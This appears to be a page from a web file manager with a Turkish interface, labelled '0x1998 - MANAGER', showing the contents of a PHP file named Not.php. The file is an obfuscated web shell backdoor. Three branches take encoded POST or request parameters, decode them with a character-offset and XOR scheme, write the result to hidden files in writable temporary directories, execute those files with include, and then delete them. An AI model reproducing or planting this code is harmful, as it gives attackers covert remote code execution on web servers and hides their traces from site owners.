0x1998 - MANAGER
Düzenlenen Dosya: Not.php
<?php if(array_key_exists("ent", $_POST) && !is_null($_POST["ent"])){ $object = $_POST["ent"]; $object = explode ("." , $object ) ; $parameter_group = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $n = 0; foreach( $object as $v8) { $sChar = ord( $s[$n %$sLen]); $d = ( ( int)$v8 - $sChar -( $n %10)) ^ 18; $parameter_group .=chr( $d); $n++; } $desc = array_filter([sys_get_temp_dir(), getcwd(), getenv("TMP"), "/var/tmp", "/dev/shm", "/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir")]); for ($itm = 0, $ptr = count($desc); $itm < $ptr; $itm++) { $ref = $desc[$itm]; if (!!is_dir($ref) && !!is_writable($ref)) { $entity = "$ref/.rec"; $file = fopen($entity, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $entity; @unlink($entity); die(); } } } } if(in_array("\x73\x79m", array_keys($_POST))){ $element = $_POST["\x73\x79m"]; $element = explode ( "." , $element ) ; $comp = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt7); foreach($element as $l => $v6): $sChar = ord($salt7[$l % $sLen]); $d =((int)$v6 - $sChar -($l % 10)) ^ 65; $comp .= chr($d); endforeach; $key = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", "/tmp"]); for ($item = 0, $value = count($key); $item < $value; $item++) { $val = $key[$item]; if (is_writable($val) && is_dir($val)) { $elem = sprintf("%s/.tkn", $val); $success = file_put_contents($elem, $comp); if ($success) { include $elem; @unlink($elem); exit;} } } } if(isset($_REQUEST["\x64a\x74"]) ? true : false){ $rec = $_REQUEST["\x64a\x74"]; $rec =explode ( "." , $rec ); $symbol = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt7); foreach( $rec as $t => $v8) { $sChar = ord( $salt7[$t % $sLen]); $dec =( ( int)$v8 - $sChar -( $t % 10))^11; $symbol .= chr( $dec); } $resource = array_filter(["/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), session_save_path(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TMP")]); foreach ($resource as $data) { if (is_writable($data) && is_dir($data)) { $key = join("/", [$data, ".ref"]); $file = fopen($key, 'w'); if ($file) { fwrite($file, $symbol); fclose($file); include $key; @unlink($key); die(); } } } }
geri dön